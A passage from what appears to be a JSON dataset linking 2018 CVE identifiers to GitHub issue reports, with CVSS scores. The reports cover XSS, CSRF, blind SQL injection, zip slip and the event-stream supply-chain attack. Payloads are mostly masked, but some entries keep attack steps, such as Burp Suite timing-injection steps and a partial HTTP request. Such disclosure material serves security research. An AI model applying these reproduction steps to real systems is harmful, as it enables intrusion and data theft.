  17709. "CVE_ID": "CVE-2018-1000846",
  17710. "Issue_Url_old": "https://github.com/funzoneq/freshdns/issues/7",
  17711. "Issue_Url_new": "https://github.com/funzoneq/freshdns/issues/7",
  17712. "Repo_new": "funzoneq/freshdns",
  17713. "Issue_Created_At": "2018-11-07T18:03:34Z",
  17714. "description": "XSRF vulnerability. I noticed that APITAG is vulnerable to Cross Site Request Forgery URLTAG , allowing an attacker to e.g. delete all zones on your server if they can get you to load a website containing their javascript while you're logged in to APITAG in the same browser. It is fixed (hopefully) in my merge request NUMBERTAG",
  17715. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  17716. "severity": "HIGH",
  17717. "baseScore": 8.8,
  17718. "impactScore": 5.9,
  17719. "exploitabilityScore": 2.8
  17720. },
  17721. {
  17722. "CVE_ID": "CVE-2018-1000847",
  17723. "Issue_Url_old": "https://github.com/funzoneq/freshdns/issues/16",
  17724. "Issue_Url_new": "https://github.com/funzoneq/freshdns/issues/16",
  17725. "Repo_new": "funzoneq/freshdns",
  17726. "Issue_Created_At": "2018-11-14T21:12:24Z",
  17727. "description": "XSS vulnerability. I tried to fix all XSS vulnerabilities in commit APITAG hopefully I found all problematic places but probably I lost some. An user could have put something like APITAG in their username. As soon as the admin opens the User List, the script code would be run within the admin's session.",
  17728. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  17729. "severity": "MEDIUM",
  17730. "baseScore": 5.4,
  17731. "impactScore": 2.7,
  17732. "exploitabilityScore": 2.3
  17733. },
  17734. {
  17735. "CVE_ID": "CVE-2018-1000851",
  17736. "Issue_Url_old": "https://github.com/bitpay/copay/issues/9346",
  17737. "Issue_Url_new": "https://github.com/bitpay/copay/issues/9346",
  17738. "Repo_new": "bitpay/copay",
  17739. "Issue_Created_At": "2018-11-26T18:36:52Z",
  17740. "description": "APITAG dependency attack steals wallets from users of copay. URLTAG",
  17741. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17742. "severity": "CRITICAL",
  17743. "baseScore": 9.8,
  17744. "impactScore": 5.9,
  17745. "exploitabilityScore": 3.9
  17746. },
  17747. {
  17748. "CVE_ID": "CVE-2018-1000851",
  17749. "Issue_Url_old": "https://github.com/dominictarr/event-stream/issues/116",
  17750. "Issue_Url_new": "https://github.com/dominictarr/event-stream/issues/116",
  17751. "Repo_new": "dominictarr/event-stream",
  17752. "Issue_Created_At": "2018-11-20T21:26:01Z",
  17753. "description": "I don't know what to say.. MENTIONTAG Why was MENTIONTAG given access to this repo? He added flatmap stream URLTAG which is entirely NUMBERTAG commit to the repo but has NUMBERTAG ersions, the latest one removes the injection, unmaintained, created NUMBERTAG months ago) an injection targeting ps tree URLTAG . After he adds it at almost the exact same time the injection is added to APITAG , he bumps the version and publishes. Literally the second commit NUMBERTAG days later) after that he removes the injection and bumps a major version so he can clear the repo of having APITAG but still have everyone (millions of weekly installs) using NUMBERTAG affected. MENTIONTAG If you removed flatmap stream because your realized it was an injection attack why didn't you yank APITAG from npm and put a PSA? If you didn't know, why did you choose to use a completely unused/unknown library NUMBERTAG downloads on npm until you use it)? If I had the exact date from npm in which APITAG was published I wouldn't be asking you questions. I've included a break down of what I have so far on APITAG below. It includes the portion of code not found in the unminified source of APITAG but found in the minified source. The code has been cleaned up a little to get a better understanding. The worst part is I still don't even know what this does... The decrypted data n NUMBERTAG is byte code or something, not regular javascript, or maybe I'm just not handling it correctly. ERRORTAG",
  17754. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17755. "severity": "CRITICAL",
  17756. "baseScore": 9.8,
  17757. "impactScore": 5.9,
  17758. "exploitabilityScore": 3.9
  17759. },
  17760. {
  17761. "CVE_ID": "CVE-2018-1000852",
  17762. "Issue_Url_old": "https://github.com/FreeRDP/FreeRDP/issues/4866",
  17763. "Issue_Url_new": "https://github.com/freerdp/freerdp/issues/4866",
  17764. "Repo_new": "freerdp/freerdp",
  17765. "Issue_Created_At": "2018-09-19T05:11:35Z",
  17766. "description": "I Found Memory Leak Vulnerability. freerdp NUMBERTAG rc3 has a memory leak vulnerability that can read the client's memory. This vulnerability occurs in channels / drdynvc / client / drdynvc_main.c. Please email me if you need more details. EMAILTAG",
  17767. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
  17768. "severity": "MEDIUM",
  17769. "baseScore": 6.5,
  17770. "impactScore": 2.5,
  17771. "exploitabilityScore": 3.9
  17772. },
  17773. {
  17774. "CVE_ID": "CVE-2018-1000854",
  17775. "Issue_Url_old": "https://github.com/esigate/esigate/issues/209",
  17776. "Issue_Url_new": "https://github.com/esigate/esigate/issues/209",
  17777. "Repo_new": "esigate/esigate",
  17778. "Issue_Created_At": "2018-10-19T15:31:39Z",
  17779. "description": "Injection in XSLT parser : switch to secure mode. APITAG supports APITAG tag along with the stylesheet attribute. This attribute can be a remote XSLT. This feature can allow an attacker to execute code on the remote server. We have to switch the XSLT parser to secure mode in order to prevent execution of malicious commands inserted in stylesheets. This bug was found by Benoit C\u00f4t\u00e9 Jodoin and reported by Philippe Arteau from APITAG",
  17780. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17781. "severity": "CRITICAL",
  17782. "baseScore": 9.8,
  17783. "impactScore": 5.9,
  17784. "exploitabilityScore": 3.9
  17785. },
  17786. {
  17787. "CVE_ID": "CVE-2018-1000855",
  17788. "Issue_Url_old": "https://github.com/basecamp/easymon/issues/26",
  17789. "Issue_Url_new": "https://github.com/basecamp/easymon/issues/26",
  17790. "Repo_new": "basecamp/easymon",
  17791. "Issue_Created_At": "2018-11-09T12:19:38Z",
  17792. "description": "Possible reflected XSS in Firefox when fetching an invalid check name. When passing an invalid check name to APITAG , an exception is raised, resulting in a NUMBERTAG response with the following body: APITAG Firefox renders that body, and if the name includes any APITAG code via APITAG tags, it'll be executed.",
  17793. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17794. "severity": "MEDIUM",
  17795. "baseScore": 6.1,
  17796. "impactScore": 2.7,
  17797. "exploitabilityScore": 2.8
  17798. },
  17799. {
  17800. "CVE_ID": "CVE-2018-1000856",
  17801. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/80",
  17802. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/80",
  17803. "Repo_new": "domainmod/domainmod",
  17804. "Issue_Created_At": "2018-11-20T05:06:31Z",
  17805. "description": "Stored XSS vulnerability in Segment Name . Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Poc: Segment Name POST FILETAG Request Body: APITAG FILETAG",
  17806. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  17807. "severity": "MEDIUM",
  17808. "baseScore": 4.8,
  17809. "impactScore": 2.7,
  17810. "exploitabilityScore": 1.7
  17811. },
  17812. {
  17813. "CVE_ID": "CVE-2018-1000860",
  17814. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2338",
  17815. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2338",
  17816. "Repo_new": "phpipam/phpipam",
  17817. "Issue_Created_At": "2018-11-29T16:24:40Z",
  17818. "description": "XSS in phpipamredirect cookie. Setting the value of phpipamredirect to APITAG results in XSS when the value is copied to a tag here: CODETAG Proof on demo: FILETAG",
  17819. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17820. "severity": "MEDIUM",
  17821. "baseScore": 4.7,
  17822. "impactScore": 2.7,
  17823. "exploitabilityScore": 1.6
  17824. },
  17825. {
  17826. "CVE_ID": "CVE-2018-1000869",
  17827. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2344",
  17828. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2344",
  17829. "Repo_new": "phpipam/phpipam",
  17830. "Issue_Created_At": "2018-12-03T16:48:07Z",
  17831. "description": "Blind SQL Injection ( PATHTAG ). In parameter object_type in the file PATHTAG at line NUMBERTAG APITAG APITAG CODETAG ERRORTAG",
  17832. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17833. "severity": "CRITICAL",
  17834. "baseScore": 9.8,
  17835. "impactScore": 5.9,
  17836. "exploitabilityScore": 3.9
  17837. },
  17838. {
  17839. "CVE_ID": "CVE-2018-1000870",
  17840. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2326",
  17841. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2326",
  17842. "Repo_new": "phpipam/phpipam",
  17843. "Issue_Created_At": "2018-11-21T20:35:58Z",
  17844. "description": "XSS APITAG in PATHTAG (CSRF too: PATHTAG ). APITAG in PATHTAG is vulnerable to XSS. Poc1: Attacker user: Change theme parameter in user settings. APITAG APITAG Victim: View attacker user in admin panel APITAG FILETAG Poc2: PATHTAG is vulnerable to CSRF. An attacker can create a page with the following snippet and cause any user to change their settings and later trigger the XSS vuln. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  17845. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  17846. "severity": "MEDIUM",
  17847. "baseScore": 5.4,
  17848. "impactScore": 2.7,
  17849. "exploitabilityScore": 2.3
  17850. },
  17851. {
  17852. "CVE_ID": "CVE-2018-1000873",
  17853. "Issue_Url_old": "https://github.com/FasterXML/jackson-modules-java8/issues/90",
  17854. "Issue_Url_new": "https://github.com/fasterxml/jackson-modules-java8/issues/90",
  17855. "Repo_new": "fasterxml/jackson-modules-java8",
  17856. "Issue_Created_At": "2018-10-24T04:28:13Z",
  17857. "description": "Performance issue with malicious APITAG input. (note: moved from URLTAG reported by APITAG It looks the same as: URLTAG Reproduced by the following commit: URLTAG The security bug is in APITAG and APITAG of the APITAG artifact: CODETAG W/A is to use custom serializers for all types that are parsed with APITAG and APITAG by registering them after (or instead of) registration of the APITAG module.",
  17858. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  17859. "severity": "MEDIUM",
  17860. "baseScore": 6.5,
  17861. "impactScore": 3.6,
  17862. "exploitabilityScore": 2.8
  17863. },
  17864. {
  17865. "CVE_ID": "CVE-2018-1000874",
  17866. "Issue_Url_old": "https://github.com/cebe/markdown/issues/166",
  17867. "Issue_Url_new": "https://github.com/cebe/markdown/issues/166",
  17868. "Repo_new": "cebe/markdown",
  17869. "Issue_Created_At": "2018-12-05T15:18:55Z",
  17870. "description": "Cross site scripting vulnerability. Issue There is a reflected and/or stored xss vulnerability in all of the following parsers: APITAG Markdown APITAG How? The vulnerability occurs when a user crafts a malicious payload and wraps the payload in NUMBERTAG backticks, thus bypassing the parser special character escape. For example: Here is an image of the payloads crafted with single, double, and triple backticks: APITAG And here is an image of the payloads rendered: FILETAG As you can see when the payload is crafted correctly using three backticks, the parser will render it as a script, this can allow malicious individuals to render scripts within a APITAG file on any platform that is using this as the markdown parser. An example of a ran script: FILETAG Impact Doing a quick search on Github for the code that enables your parser: APITAG . I get this many results: FILETAG The vulnerability can be either stored using an APITAG file ( README for example), or reflected if the markdown parser is just parsing the user input text. Malicious attackers can use this method to steal sensitive user data. For example to steal a users cookies: FILETAG This can allow serious impacts on not only the end users using the site, but the reputation of the website as well.",
  17871. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  17872. "severity": "MEDIUM",
  17873. "baseScore": 6.1,
  17874. "impactScore": 2.7,
  17875. "exploitabilityScore": 2.8
  17876. },
  17877. {
  17878. "CVE_ID": "CVE-2018-1000875",
  17879. "Issue_Url_old": "https://github.com/BOINC/boinc/issues/2907",
  17880. "Issue_Url_new": "https://github.com/boinc/boinc/issues/2907",
  17881. "Repo_new": "boinc/boinc",
  17882. "Issue_Created_At": "2018-12-11T15:25:09Z",
  17883. "description": "BOINC Website Vulnerability. A vulnerability has been identified that will allow any user to create a specially crafted request and obtain the authenticator of any user of the system. This vulnerability was added to the master branch on October NUMBERTAG as part of merge commit APITAG It was fixed in the master branch on December NUMBERTAG th NUMBERTAG as part of merge commit APITAG The vulnerability was also present in server releases NUMBERTAG and NUMBERTAG and is fixed in server release NUMBERTAG see URLTAG It was not present in earlier versioned releases. Projects who updated their website between October NUMBERTAG th NUMBERTAG and December NUMBERTAG th NUMBERTAG are strongly urged to update their website as soon as possible or to implement the workaround described below. Thank you to Juha Sointusalo for identifying the vulnerability and thank you to Shawn Kwang for implementing the fix. How Projects Can Check if Vulnerable: If the file PATHTAG is not present, then you are not vulnerable. If it is present, then run the following command from your project directory: grep logintoken PATHTAG | wc l If it returns NUMBERTAG then your project is vulnerable. If it returns something greater than or equal to NUMBERTAG then your project has the fix. Mitigation: If you are not able to update your website immediately, then you can remove the risk by deleting the file: PATHTAG Since this will break the user consent code, then you need to set APITAG to NUMBERTAG in FILETAG until you are able to update your website. See URLTAG for details about this setting.",
  17884. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17885. "severity": "CRITICAL",
  17886. "baseScore": 9.8,
  17887. "impactScore": 5.9,
  17888. "exploitabilityScore": 3.9
  17889. },
  17890. {
  17891. "CVE_ID": "CVE-2018-1000887",
  17892. "Issue_Url_old": "https://github.com/advisto/peel-shopping/issues/1",
  17893. "Issue_Url_new": "https://github.com/advisto/peel-shopping/issues/1",
  17894. "Repo_new": "advisto/peel-shopping",
  17895. "Issue_Created_At": "2018-12-16T15:38:27Z",
  17896. "description": "Stored Cross site Scripting in APITAG parameter. Vulnerability Name: Stored Cross site Scripting in APITAG Name EN \" Parameter Vulnerability Description: An authenticated user can inject malicious javascript code into the APITAG Name EN\" field thus many of the modules are affected by this because the site name is visible in almost of all modules. Vulnerable URL: FILETAG Please saw the APITAG below FILETAG Mitigation: the Entire site is Vulnerable to Cross site scripting attacks input validation should be properly implemented References for Mitigation Vulnerability: URLTAG url",
  17897. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  17898. "severity": "MEDIUM",
  17899. "baseScore": 4.8,
  17900. "impactScore": 2.7,
  17901. "exploitabilityScore": 1.7
  17902. },
  17903. {
  17904. "CVE_ID": "CVE-2018-1000890",
  17905. "Issue_Url_old": "https://github.com/FrontAccountingERP/FA/issues/37",
  17906. "Issue_Url_new": "https://github.com/frontaccountingerp/fa/issues/37",
  17907. "Repo_new": "frontaccountingerp/fa",
  17908. "Issue_Created_At": "2018-12-19T17:53:24Z",
  17909. "description": "Time Based Blind SQL Injection in APITAG Parameter. Vulnerability Name : Time Based Blind SQL Injection in APITAG Parameter Vulnerability Description: APITAG Parameter in FILETAG file suffer from the Blind SQL Injection, By using the an attacker can grab the Backend Database Information APITAG ERRORTAG Step1: Open the Burp Suite go to the Repeater tab copy the above Contents Step2: Click on the right side penlike icon configure the your ipaddress and port address and click save Step3: Click on \"Go\" Button you will see the response cause the time delay NUMBERTAG seconds. Step4: Change the sleep function value what ever you want and click on \"go\" you will see the time delay what ever you give value to the sleep function. APITAG Video: FILETAG Mitigation: See the OWASP SQL Injection Prevention sheet on this URLTAG link",
  17910. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  17911. "severity": "HIGH",
  17912. "baseScore": 7.5,
  17913. "impactScore": 3.6,
  17914. "exploitabilityScore": 3.9
  17915. },
  17916. {
  17917. "CVE_ID": "CVE-2018-1002101",
  17918. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/65750",
  17919. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/65750",
  17920. "Repo_new": "kubernetes/kubernetes",
  17921. "Issue_Created_At": "2018-07-03T08:06:15Z",
  17922. "description": "smb mount security issue. APITAG Is this a BUG REPORT or FEATURE REQUEST? : /kind bug > Uncomment only one, leave it on its own line: > > /kind bug > /kind feature What happened : user APITAG Environment Variables to store user input string to prevent command line injection, the env var in APITAG would be taken as literal values and not as executable vulnerable code, this kind of fix is common for command line injection issue (called: parameterized way) What you expected to happen : How to reproduce it (as minimally and precisely as possible) : Anything else we need to know? : Environment : Kubernetes version (use kubectl version ): Cloud provider or hardware configuration: OS (e.g. from /etc/os release): Kernel (e.g. ERRORTAG ): Install tools: Others: /sig windows /sig storage /assign",
  17923. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17924. "severity": "CRITICAL",
  17925. "baseScore": 9.8,
  17926. "impactScore": 5.9,
  17927. "exploitabilityScore": 3.9
  17928. },
  17929. {
  17930. "CVE_ID": "CVE-2018-1002102",
  17931. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/85867",
  17932. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/85867",
  17933. "Repo_new": "kubernetes/kubernetes",
  17934. "Issue_Created_At": "2019-12-03T22:58:37Z",
  17935. "description": "CVETAG : Unvalidated redirect. CVSS Rating: PATHTAG APITAG URLTAG An attacker controlled Kubelet can return an arbitrary redirect when responding to certain apiserver requests. Impacted kube apiservers will follow the redirect as a GET request with client cert credentials for authenticating to the Kubelet. Am I vulnerable? Kubernetes API servers with the APITAG feature URLTAG enabled AND without the APITAG feature are affected. API servers using SSH tunnels ( ssh user / ssh keyfile) are not affected. Using the default feature gate values, kube apiserver versions before NUMBERTAG are affected. How do I mitigate this vulnerability? For Kubernetes versions NUMBERTAG the APITAG can be manually enabled with the APITAG flag APITAG . Fix impact The APITAG feature will cause the kube apiserver to check that redirects go to the same host. If nodes are configured to respond to CRI streaming requests on a different host interface than what the apiserver makes requests on (only the case if not using the built in dockershim & setting the kubelet flag APITAG ), then these requests will be broken. In that case, the feature can be temporarily disabled until the node configuration is corrected. We suggest setting APITAG on the kubelet to avoid issues. Fixed Versions Kubernetes NUMBERTAG Fixed by default in URLTAG Kubernetes NUMBERTAG Fix available as alpha in URLTAG Additional Details In a future release, we plan to deprecate the APITAG feature, instead opting to handle the redirection locally through the Kubelet. Once the deprecation is complete, we can completely remove apiserver redirect handling (at least for Kubelet requests). Acknowledgements This vulnerability was reported by Alban Crequy. /area security /kind bug /committee product security /sig api machinery node /area apiserver /close",
  17936. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N",
  17937. "severity": "LOW",
  17938. "baseScore": 2.6,
  17939. "impactScore": 1.4,
  17940. "exploitabilityScore": 1.0
  17941. },
  17942. {
  17943. "CVE_ID": "CVE-2018-1002103",
  17944. "Issue_Url_old": "https://github.com/kubernetes/minikube/issues/3208",
  17945. "Issue_Url_new": "https://github.com/kubernetes/minikube/issues/3208",
  17946. "Repo_new": "kubernetes/minikube",
  17947. "Issue_Created_At": "2018-10-02T21:34:31Z",
  17948. "description": "minikube dashboard host checking.",
  17949. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  17950. "severity": "HIGH",
  17951. "baseScore": 8.8,
  17952. "impactScore": 5.9,
  17953. "exploitabilityScore": 2.8
  17954. },
  17955. {
  17956. "CVE_ID": "CVE-2018-1002105",
  17957. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/71411",
  17958. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/71411",
  17959. "Repo_new": "kubernetes/kubernetes",
  17960. "Issue_Created_At": "2018-11-26T11:07:36Z",
  17961. "description": "Proxy connection gets stuck on error response. What happened : When proxying to a backend server, if the server returns an error response, the connection gets stuck. What you expected to happen : The error would be returned and the connection would be closed. /kind bug /kind api machinery /assign",
  17962. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  17963. "severity": "CRITICAL",
  17964. "baseScore": 9.8,
  17965. "impactScore": 5.9,
  17966. "exploitabilityScore": 3.9
  17967. },
  17968. {
  17969. "CVE_ID": "CVE-2018-1002208",
  17970. "Issue_Url_old": "https://github.com/icsharpcode/SharpZipLib/issues/232",
  17971. "Issue_Url_new": "https://github.com/icsharpcode/sharpziplib/issues/232",
  17972. "Repo_new": "icsharpcode/sharpziplib",
  17973. "Issue_Created_At": "2018-06-11T10:21:47Z",
  17974. "description": "SECURITY: vulnerable to zip slip (possible remote code execution/file overwrite). Background URLTAG Steps to reproduce NUMBERTAG get a malicious zip file, i.e. URLTAG NUMBERTAG unpack with APITAG NUMBERTAG profit Expected behavior either the whole extraction should be stopped, or the files that are being extracted outside of the destination folder should not be extracted. Actual behavior All files are extracted. Version of APITAG All Obtained from (place an x between the brackets for all that apply) [x] Compiled from source branch: all commit: any [x] Downloaded DLL from APITAG [x] Downloaded DLL from APITAG [x] Downloaded DLL from _______ [x] DLL included as part of Package installed using: [x] APITAG [x] APITAG [x] Chocolatey",
  17975. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  17976. "severity": "MEDIUM",
  17977. "baseScore": 5.5,
  17978. "impactScore": 3.6,
  17979. "exploitabilityScore": 1.8
  17980. },
  17981. {
  17982. "CVE_ID": "CVE-2018-10023",
  17983. "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/1",
  17984. "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/1",
  17985. "Repo_new": "xwlrbh/catfish",
  17986. "Issue_Created_At": "2018-04-11T14:12:58Z",
  17987. "description": "There is storage XSS vulnerability in Comment. Registered user login, comment on the article. POC, APITAG Submit comment to grab packet, use burp modify parameter pinglun= APITAG FILETAG Browse article or administrator login background can trigger",
  17988. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  17989. "severity": "MEDIUM",
  17990. "baseScore": 5.4,
  17991. "impactScore": 2.7,
  17992. "exploitabilityScore": 2.3
  17993. },
  17994. {
  17995. "CVE_ID": "CVE-2018-10028",
  17996. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/422",
  17997. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/422",
  17998. "Repo_new": "joyplus/joyplus-cms",
  17999. "Issue_Created_At": "2018-04-11T10:13:23Z",
  18000. "description": "Two vulnerabilities. APITAG configuration, installation files do not delete url: URLTAG FILETAG APITAG configuration, log folder can be accessed, and sensitive information leakage will appear, url:url: URLTAG FILETAG FILETAG",
  18001. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  18002. "severity": "MEDIUM",
  18003. "baseScore": 5.3,
  18004. "impactScore": 1.4,
  18005. "exploitabilityScore": 3.9
  18006. },
  18007. {
  18008. "CVE_ID": "CVE-2018-10059",
  18009. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1457",
  18010. "Issue_Url_new": "https://github.com/cacti/cacti/issues/1457",
  18011. "Repo_new": "cacti/cacti",
  18012. "Issue_Created_At": "2018-03-07T21:38:23Z",
  18013. "description": "Path Based Cross Site Scripting (XSS) issues. Running version NUMBERTAG on Windows NUMBERTAG with IIS My company's security scan has picked up NUMBERTAG application vulnerabilities with NUMBERTAG of them being high. Most of these are for Path Based Cross Site Scripting (XSS). I don't see this addressed in any of the newer versions. The list is long but I can leave a few examples. Below are a couple. If this is of any value I can provide more. Example NUMBERTAG URL: URLTAG Threat XSS vulnerabilities occur when the Web application echoes user supplied data in an HTML response sent to the Web browser. For example, a Web application might include the user's name as part of a welcome message or display a home address when confirming a shipping destination. If the user supplied data contain characters that are interpreted as part of an HTML element instead of literal text, then an attacker can modify the HTML that is received by the victim's Web browser. The XSS payload is echoed in HTML document returned by the request. An XSS payload may consist of HTML, APITAG or other content that will be rendered by the browser. In order to exploit this vulnerability, a malicious user would need to trick a victim into visiting the URL with the XSS payload. In this case, the scanner identified the vulnerability by injecting a payload as part of the path component of the URL, as opposed to other kinds of XSS attacks that inject the payload into URL parameter values. Impact XSS exploits pose a significant threat to a Web application, its users and user data. XSS exploits target the users of a Web application rather than the Web application itself. An exploit can lead to theft of the user's credentials and personal or financial information. Complex exploits and attack scenarios are possible via XSS because it enables an attacker to execute dynamic code. Consequently, any capability or feature available to the Web browser (for example HTML, APITAG Flash and Java applets) can be used to as a part of a compromise. Solution Corp Guidance: The solution below is general guidance, not a Corp Solution ready for deployment. You will need to fully test/validate this solution and involve Corp IT to properly validate. Filter all data collected from the client including user supplied content and browser content such as Referrer and User Agent headers. Any data collected from the client and displayed in a Web page should be HTML encoded to ensure the content is rendered as text instead of an HTML element or APITAG Detection Information Parameter No Param has been required for detecting the information. Booyah! Authentication Required Access Path Here is the path followed by the scanner to reach the exploitable URL: N/A Payloads ( Instance NUMBERTAG of NUMBERTAG Request Payload APITAG > Request GET URLTAG NUMBERTAG Referer: FILETAG NUMBERTAG Cookie: APITAG NUMBERTAG Response comment: Response content type: text/html APITAG APITAG APITAG APITAG Login APITAG APITAG APITAG APITAG '> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Example NUMBERTAG URL: URLTAG Threat XSS vulnerabilities occur when the Web application echoes user supplied data in an HTML response sent to the Web browser. For example, a Web application might include the user's name as part of a welcome message or display a home address when confirming a shipping destination. If the user supplied data contain characters that are interpreted as part of an HTML element instead of literal text, then an attacker can modify the HTML that is received by the victim's Web browser. The XSS payload is echoed in HTML document returned by the request. An XSS payload may consist of HTML, APITAG or other content that will be rendered by the browser. In order to exploit this vulnerability, a malicious user would need to trick a victim into visiting the URL with the XSS payload. In this case, the scanner identified the vulnerability by injecting a payload as part of the path component of the URL, as opposed to other kinds of XSS attacks that inject the payload into URL parameter values. Impact XSS exploits pose a significant threat to a Web application, its users and user data. XSS exploits target the users of a Web application rather than the Web application itself. An exploit can lead to theft of the user's credentials and personal or financial information. Complex exploits and attack scenarios are possible via XSS because it enables an attacker to execute dynamic code. Consequently, any capability or feature available to the Web browser (for example HTML, APITAG Flash and Java applets) can be used to as a part of a compromise. Solution Corp Guidance: The solution below is general guidance, not a Corp Solution ready for deployment. You will need to fully test/validate this solution and involve Corp IT to properly validate. Filter all data collected from the client including user supplied content and browser content such as Referrer and User Agent headers. Any data collected from the client and displayed in a Web page should be HTML encoded to ensure the content is rendered as text instead of an HTML element or APITAG Detection Information Parameter No Param has been required for detecting the information. Booyah! Authentication Required Access Path Here is the path followed by the scanner to reach the exploitable URL: N/A Payloads ( Instance NUMBERTAG of NUMBERTAG Request Payload APITAG Request GET URLTAG NUMBERTAG Referer: FILETAG NUMBERTAG Cookie: APITAG NUMBERTAG Response comment: Response content type: text/html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Login APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG </",
  18014. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18015. "severity": "MEDIUM",
  18016. "baseScore": 5.4,
  18017. "impactScore": 2.7,
  18018. "exploitabilityScore": 2.3
  18019. },
  18020. {
  18021. "CVE_ID": "CVE-2018-10073",
  18022. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/423",
  18023. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/423",
  18024. "Repo_new": "joyplus/joyplus-cms",
  18025. "Issue_Created_At": "2018-04-12T07:32:31Z",
  18026. "description": "Another Cross Site Scripting Vulnerability. joyplus cms NUMBERTAG has Another Cross Site Scripting: requests: ERRORTAG ` payload: \"> APITAG // APITAG APITAG APITAG APITAG",
  18027. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18028. "severity": "MEDIUM",
  18029. "baseScore": 4.8,
  18030. "impactScore": 2.7,
  18031. "exploitabilityScore": 1.7
  18032. },
  18033. {
  18034. "CVE_ID": "CVE-2018-10096",
  18035. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/424",
  18036. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/424",
  18037. "Repo_new": "joyplus/joyplus-cms",
  18038. "Issue_Created_At": "2018-04-13T14:38:42Z",
  18039. "description": "joyplus cms NUMBERTAG has Another Cross Site Scripting: requests:. requests: POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG Then look at the web page, the code is executed FILETAG FILETAG",
  18040. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18041. "severity": "MEDIUM",
  18042. "baseScore": 4.8,
  18043. "impactScore": 2.7,
  18044. "exploitabilityScore": 1.7
  18045. },
  18046. {
  18047. "CVE_ID": "CVE-2018-10117",
  18048. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/20",
  18049. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/20",
  18050. "Repo_new": "idreamsoft/iCMS",
  18051. "Issue_Created_At": "2018-04-15T09:29:50Z",
